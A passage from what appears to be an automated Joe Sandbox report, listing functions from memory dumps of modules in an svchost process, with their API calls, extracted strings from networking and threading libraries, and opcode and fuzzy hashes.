                          Function 00007FFDA55C9660 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 212COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00007FFDA55CA6B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6E2
                            • Part of subcall function 00007FFDA55CA6B0: _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55CA6F0
                            • Part of subcall function 00007FFDA55CA6B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6FC
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C9722
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C9773
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C97DD
                            • Part of subcall function 00007FFDA5582C60: wcschr.VCRUNTIME140 ref: 00007FFDA5582CC1
                            • Part of subcall function 00007FFDA5582C60: _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA5582CED
                            • Part of subcall function 00007FFDA5582C60: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5582D2B
                            • Part of subcall function 00007FFDA5582C60: wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA5582D46
                            • Part of subcall function 00007FFDA5582C60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5582D64
                            • Part of subcall function 00007FFDA5582C60: _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA5582D7D
                            • Part of subcall function 00007FFDA5582C60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5582DA9
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_wcsdup$callocmalloc$wcschrwcsncpy
                          • String ID: GSSAPI$GSSAPI handshake failure (empty challenge message)$Kerberos$SSPI: couldn't get auth info
                          • API String ID: 3657581166-3211747215
                          • Opcode ID: be77fdceb083cccfa667339f0eccfff52253ab26ffe642b20fd30fd3a419145d
                          • Instruction ID: 31844f3552d079d4477effce7be21ad8c3770c471b5dd554d4c01b9a0fc2e251
                          • Opcode Fuzzy Hash: be77fdceb083cccfa667339f0eccfff52253ab26ffe642b20fd30fd3a419145d
                          • Instruction Fuzzy Hash: 1E915A7AB0AB4A86EB128F65E4603AD23B5FB46F88F404035DE4D57B9ADF38E445C344
                          Function 00007FFDA559A810 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 149COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: Digest$stale$true
                          • API String ID: 1294909896-2487968700
                          • Opcode ID: 825711940c4339f0b0f10af0562f396d60dc81393043e1d307ce092e7f71487e
                          • Instruction ID: c335a99cbadb19cf2d1e36b32c6a9d81d9c27544e3f2b270599612dd5680b134
                          • Opcode Fuzzy Hash: 825711940c4339f0b0f10af0562f396d60dc81393043e1d307ce092e7f71487e
                          • Instruction Fuzzy Hash: A451B46AB0EA8A81EB628F15E4603B963B1EB47F84F445131EA8D037C6DF2CF555C618
                          Function 649415C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 126COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • &, xrefs: 6494160E
                          • (((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0), xrefs: 64941621
                          • Assertion failed: (%s), file %s, line %d, xrefs: 64941628
                          • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c, xrefs: 64941616
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: __iob_func
                          • String ID: &$(((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c$Assertion failed: (%s), file %s, line %d
                          • API String ID: 686374508-3470151808
                          • Opcode ID: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                          • Instruction ID: a6c690fc7c4ad125f6452d29da4510a78f9609d2262ab1e3dfa78bf125776778
                          • Opcode Fuzzy Hash: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                          • Instruction Fuzzy Hash: FD41D13339160586EB20DB36E91436E6765E792BECF884121DE1E47764DF38C892C700
                          Function 00007FFDA5594560 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _gmtime64
                          • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                          • API String ID: 1355024304-4153637960
                          • Opcode ID: faf39b1bc8a21587184d5586f50a3b0ceb46b29f085b2b703a6ec10082a9352d
                          • Instruction ID: 826a5d17b9ccb0fa284de1ccc02cefc628cf83902ec4d9e7a5afc36960fb146d
                          • Opcode Fuzzy Hash: faf39b1bc8a21587184d5586f50a3b0ceb46b29f085b2b703a6ec10082a9352d
                          • Instruction Fuzzy Hash: D741407A70E78AC6E621DF15E46037A67A0FB87B80F500132DA4D47B96DF2CE901CB44
                          Function 00007FFDA5589510 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: Failure sending QUIT command: %s$QUIT
                          • API String ID: 1294909896-1162443993
                          • Opcode ID: e9f5c25c0c0cbdff4d56f90e4297242a8fbafeb5f8e24c25148f9f13a79a548b
                          • Instruction ID: 07630ced8d844cbd4729e9a9dbd03d6593db781f3d30065bb9f774d2a8eb5e9b
                          • Opcode Fuzzy Hash: e9f5c25c0c0cbdff4d56f90e4297242a8fbafeb5f8e24c25148f9f13a79a548b
                          • Instruction Fuzzy Hash: 7D318D7AB0E78981EB169F21E4643A933A0EF46F84F484071DE4D07B86DF2CE099C725
                          Function 00007FFDA55784B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _errno$ErrorLast$getsockname
                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                          • API String ID: 837846698-2605427207
                          • Opcode ID: 5c634eb2012870781e77425daf34be7e0c5be7cdabfc357b16345476ad618bd3
                          • Instruction ID: 96ebea0360ecff7b1f80defa99b085c1545afcfa8152981b6359c27da0f6b221
                          • Opcode Fuzzy Hash: 5c634eb2012870781e77425daf34be7e0c5be7cdabfc357b16345476ad618bd3
                          • Instruction Fuzzy Hash: CB315F27B1D7CAD2EA21CF11E4603EA6360FB9AB84F405236EA8C47756DF6CD1858744
                          Function 64941AC0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • CreateSemaphoreA.KERNEL32 ref: 64941B20
                          • CreateSemaphoreA.KERNEL32 ref: 64941B36
                          • InitializeCriticalSection.KERNEL32 ref: 64941B5B
                          • InitializeCriticalSection.KERNEL32 ref: 64941B61
                          • InitializeCriticalSection.KERNEL32 ref: 64941B67
                          • CloseHandle.KERNEL32 ref: 64941B90
                          • CloseHandle.KERNEL32 ref: 64941BA5
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection$CloseCreateHandleSemaphore
                          • String ID:
                          • API String ID: 3487344249-0
                          • Opcode ID: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                          • Instruction ID: 31c3c2f24a53828e468885d33ffcfcee3f6f88692367c2784a926345d8c92843
                          • Opcode Fuzzy Hash: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                          • Instruction Fuzzy Hash: 40219D327016418AFB099F32F9503AA37E5EB45B98F088139CE2D4B398EF38C495C750
                          Function 00007FFDA55AC510 Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00007FFDA55BF210: QueryPerformanceCounter.KERNEL32(?,?,00000000,00007FFDA55AC534), ref: 00007FFDA55BF227
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CA5
                            • Part of subcall function 00007FFDA5580C70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CB8
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CDF
                            • Part of subcall function 00007FFDA5580C70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CEC
                          • MoveFileExW.KERNEL32 ref: 00007FFDA55AC559
                          • Sleep.KERNEL32 ref: 00007FFDA55AC5A4
                          • MoveFileExW.KERNEL32 ref: 00007FFDA55AC5B6
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC5C8
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC5D6
                            • Part of subcall function 00007FFDA55BF210: GetTickCount.KERNEL32 ref: 00007FFDA55BF25D
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC5FB
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AC609
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$ByteCharFileMoveMultiWide$CountCounterPerformanceQuerySleepTickmalloc
                          • String ID:
                          • API String ID: 1097834511-0
                          • Opcode ID: ca3577dfe5bef956fbc6c669d8edf1fb2a578caef158fe90979b2991c79747d3
                          • Instruction ID: e51c6f0728b4574bda9d9396a838e7530eca88afaf210e33285bfd71b0563f09
                          • Opcode Fuzzy Hash: ca3577dfe5bef956fbc6c669d8edf1fb2a578caef158fe90979b2991c79747d3
                          • Instruction Fuzzy Hash: 46218116B1E68A82FE169F15A4293B9A390AF8BF80F444530EE4E07797DE2DE5418708
                          Function 00007FFDA557E5F0 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: ?
                          • API String ID: 1294909896-1684325040
                          • Opcode ID: a20218bfb257facea1c921fba6cb485ed81ff14735969ac4d056631ba2a8c591
                          • Instruction ID: f6de6b5d530b7911a1ccfe7a6f05a97fe1f357e73955e3e9e7f5c90d5aa7193a
                          • Opcode Fuzzy Hash: a20218bfb257facea1c921fba6cb485ed81ff14735969ac4d056631ba2a8c591
                          • Instruction Fuzzy Hash: E621393AB1AB5581E712AF12E814229B374FB46FD4F180431EE8D07B99CF7CD4458708
                          Function 64946E80 Relevance: 10.5, APIs: 7, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentHandleOpen_errno
                          • String ID:
                          • API String ID: 2250453136-0
                          • Opcode ID: 647cea97fea39e1f8afd9dff8aee47f7913a4ca09984285e2b8a4a307c22f2b2
                          • Instruction ID: c4dd9a8f5984872ef2400fb7ba57e55cf54f323c349d37ceb4cc8f7486eb7d88
                          • Opcode Fuzzy Hash: 647cea97fea39e1f8afd9dff8aee47f7913a4ca09984285e2b8a4a307c22f2b2
                          • Instruction Fuzzy Hash: ED01B57538570183EB1D5F65D84831E26E79F4BB69F144228DE29423E1EF3EC968C620
                          Function 64942D50 Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID:
                          • API String ID: 2086374402-0
                          • Opcode ID: fa800a1db800350b0fed09132d4c30b4d464a2c5f92782d6f3b1fde1cd7d91d6
                          • Instruction ID: 9532cd4f251b3658310ae2195131a0e08aaebdb09fc5c0f89b68fa3098675641
                          • Opcode Fuzzy Hash: fa800a1db800350b0fed09132d4c30b4d464a2c5f92782d6f3b1fde1cd7d91d6
                          • Instruction Fuzzy Hash: 0331AE227855018AFB168F75E90479A63A6FB85BE9F188535CE18CB384EF38C891C350
                          Function 649449D0 Relevance: 9.1, APIs: 6, Instructions: 104sleepthreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Value$CloseCurrentHandleSleepThread__iob_func_endthreadex
                          • String ID:
                          • API String ID: 2572950730-0
                          • Opcode ID: 41b3f4f05ea4d5a442d3e756eee48522d3bf42455cc12e4d92245cde5d4bd361
                          • Instruction ID: b6c95add572710b94ebec18b46ddd7a509098b6565972d843aeaf9d7d1c37827
                          • Opcode Fuzzy Hash: 41b3f4f05ea4d5a442d3e756eee48522d3bf42455cc12e4d92245cde5d4bd361
                          • Instruction Fuzzy Hash: 8C413C35280B0085EB24DF32D8903AE27A5FB99BECF095226DE1E577A4DF38C495CB50
                          Function 64942C10 Relevance: 9.1, APIs: 6, Instructions: 97synchronizationthreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 64942C62
                          • WaitForSingleObject.KERNEL32(?,?,?,?,64941698), ref: 64942CAD
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentObjectSingleThreadWait
                          • String ID:
                          • API String ID: 1728940165-0
                          • Opcode ID: ad35e8303b8d8428d97bb6b51cf9c3b71cc4d122781135cfe85f96bea711820f
                          • Instruction ID: 34c95b49e9a65028a90b0e91656b60c0aa03b26a43158414cd96aabb3d2393cf
                          • Opcode Fuzzy Hash: ad35e8303b8d8428d97bb6b51cf9c3b71cc4d122781135cfe85f96bea711820f
                          • Instruction Fuzzy Hash: 7931A5367812058BEB068F35E94078A22A6F745BDEF288574CE0CCB344FE39C891C760
                          Function 00007FFDA55CB7A0 Relevance: 9.1, APIs: 6, Instructions: 88encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB812
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB835
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB867
                          • CertCloseStore.CRYPT32 ref: 00007FFDA55CB880
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,?,00007FFDA55CDBDC), ref: 00007FFDA55CB889
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00007FFDA55CDBDC), ref: 00007FFDA55CB893
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$CertCloseStore_strdupcallocmalloc
                          • String ID:
                          • API String ID: 1848418515-0
                          • Opcode ID: 5faf728eb462a36751afea2e00b5c60b4713b7117fe3682ada99c731608e7726
                          • Instruction ID: 23a006cb59d1ac5507ae2314c8e84932da297a40e136bd6b3cb651a225693197
                          • Opcode Fuzzy Hash: 5faf728eb462a36751afea2e00b5c60b4713b7117fe3682ada99c731608e7726
                          • Instruction Fuzzy Hash: 12317C2AB0BB8685EB16DF23A86037963A0FF49F94F484035DE5D07B56DF38E4958308
                          Function 00007FFDA55A4620 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: attempt to borrow xfer_buf when already borrowed$could not allocate xfer_buf of %zu bytes$transfer buffer size is 0$transfer has no multi handle
                          • API String ID: 0-2388664328
                          • Opcode ID: 59ba4c3927c6c3a9a0c2c74c0a87f7fc254b4a362eaf655a95ac167fbeeeb36b
                          • Instruction ID: 1eedca272aed18eda4de9504040e8aa9b135a81be78ebd87349dc3d6c4609cfe
                          • Opcode Fuzzy Hash: 59ba4c3927c6c3a9a0c2c74c0a87f7fc254b4a362eaf655a95ac167fbeeeb36b
                          • Instruction Fuzzy Hash: 60416D3A70AB89C0EB42DF95E4A43B93360EB86F84F588432DE4D47356CF39D4858714
                          Function 00007FFDA55A47A0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
